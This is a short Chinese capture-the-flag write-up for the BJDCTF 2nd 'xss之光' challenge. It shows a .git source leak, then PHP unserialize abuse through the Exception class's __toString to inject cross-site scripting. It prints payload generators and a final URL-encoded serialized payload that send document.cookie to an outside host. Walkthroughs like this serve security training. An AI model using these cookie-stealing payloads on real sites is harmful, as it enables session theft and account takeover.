[BJDCTF 2nd]xss之光
扫后台,有.git 泄露
githack下载下来
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
源码只有这三行。
可触发序列化中的魔术方法__toString
__toString
的原生类:
- ERROR 适用于php7版本
Error类就是php的一个内置类用于自动自定义一个Error,在php7的环境下可能会造成一个xss漏洞,因为它内置有一个toString的方法。 - EXCEPTION 适用于php5、7版本
这个类利用的方式和原理和Error 类一模一样,但是适用于php5和php7,相对之下更加好用
<?php
$y1ng = new Exception("<script>window.open('url/?'+document.cookie);</script>");
echo urlencode(serialize($y1ng));
?>
//window.open 是 javaScript 打开新窗口的方法
也可以用window.location.href='url'来实现恶意跳转
<?php
$a = new Exception("<script>window.location.href='url'+document.cookie</script>");
echo urlencode(serialize($a));
?>
或者用alert(document.cookie)直接弹出cookie,但此题不行,可能开了httponly(见附录)。
<?php
$y1ng = new Exception("<script>alert(document.cookie)</script>");
echo urlencode(serialize($y1ng));
?>
引自这篇文章
<?php
$y1ng = new Exception("<script>window.open('http://68d1a13c-abde-4bcc-aa80-eb78d3e543cc.node3.buuoj.cn//?'+document.cookie);</script>");
echo urlencode(serialize($y1ng));
?>
?yds_is_so_beautiful=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A110%3A%22%3Cscript%3Ewindow.open%28%27http%3A%2F%2F68d1a13c-abde-4bcc-aa80-eb78d3e543cc.node3.buuoj.cn%2F%2F%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
我也不知道为啥在这里